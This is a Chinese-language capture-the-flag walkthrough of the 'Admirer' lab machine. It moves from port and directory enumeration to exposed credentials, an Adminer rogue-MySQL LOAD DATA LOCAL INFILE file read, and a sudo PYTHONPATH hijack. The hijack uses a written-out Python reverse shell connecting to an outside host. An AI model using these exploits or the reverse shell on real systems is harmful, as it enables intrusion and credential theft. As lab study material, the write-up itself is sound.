[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…

2024-08-01 192 0

信息收集

IP Address Opening Ports
10.10.10.187 TCP:21,22,80

$ nmap -p- 10.10.10.187 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-title: Admirer
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Username Password Type
waldo.11 Ezy]m27}OREc$ Bank
[email protected] fgJr6q#S\W:$P Mail
ftpuser %n?4Wz}R$tTF7 FTP
admin w0rdpr3ss01! WordPress
waldo ]F7jLHw:*G>UPrTo}~A"d6b DB:admirerdb
waldo Wh3r3_1s_w4ld0? DB
waldo &<h5b~yK3F#{PaPB&dA}{H> SSH

目录爆破

http://10.10.10.187/admin-dir/

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图

$ $ gobuster dir -u "http://10.10.10.187/admin-dir/" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x .txt,.php

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图1

http://10.10.10.187/admin-dir/credentials.txt

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图2

username:ftpuser
password:%n?4Wz}R$tTF7

FTP

$ ftp 10.10.10.187

ftp> get html.tar.gz

ftp> get dump.sql

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图3

$ tar -zxvf html.tar.gz

敏感信息

$ grep -iR password ./

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图4

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图5

username:waldo
password:]F7jLHw:*G>UPrTo}~A"d6b
password:Wh3r3_1s_w4ld0?

$ gobuster dir -u "http://10.10.10.187/utility-scripts/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图6

Adminer远程Mysql反向文件读取

$ sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图7

$ sudo service mysql start
$ sudo mysql -uroot -p

MariaDB [(none)]> CREATE DATABASE H4CK13;
MariaDB [(none)]> CREATE USER 'admin'@'10.10.10.187' IDENTIFIED BY 'TEST';

MariaDB [(none)]> GRANT ALL ON H4CK13.* TO 'admin'@'10.10.10.187';

MariaDB [(none)]> FLUSH PRIVILEGES;

MariaDB [(none)]> CREATE TABLE TEST_LOAD(OUTPUT TEXT(4096));

http://10.10.10.187/utility-scripts/adminer.php

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图8

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图9

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图10

由于限制路径,仅允许读取/var/www/html目录下文件

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图11

http://10.10.10.187/utility-scripts//adminer.php?server=10.10.16.5&username=admin&db=H4CK13&sql=

LOAD DATA LOCAL INFILE '/var/www/html/index.php' INTO TABLE TEST_LOAD FIELDS TERMINATED BY "\n"

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图12

select * from TEST_LOAD

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图13

username:waldo
password:&<h5b~yK3F#{PaPB&dA}{H>

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图14

User.txt 截屏

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图15

User.txt 内容

64332fee15a06c428fa01b4185bdd695

权限提升

$ sudo -l

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图16

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图17

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图18

通过劫持shutil来获取反向shell

/dev/shm 是一个在 Linux 和 Unix 系统上常见的临时文件系统目录,代表共享内存(shared memory)。它是由 Linux 内核中的 tmpfs 文件系统实现的。使用 /dev/shm 可以快速地在进程之间共享数据,因为它使用的是内存而不是磁盘,因此读写速度非常快。

$ vi /dev/shm/shutil.py

# shutil.py
import socket,subprocess,os
import pty;
def make_archive(a,b,c):
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect(("10.10.16.5",10032))
  os.dup2(s.fileno(),0)
  os.dup2(s.fileno(),1)
  os.dup2(s.fileno(),2)
  pty.spawn("/bin/sh")

$ sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh

> 6

将python环境设置在/dev/shm目录,这样执行backup.py的时候将从/dev/shm导入包

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图19

Root.txt 截屏

[Meachines] [Easy] Adminer Adminer远程Mysql反向文件读取+Py…插图20

Root.txt 内容


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论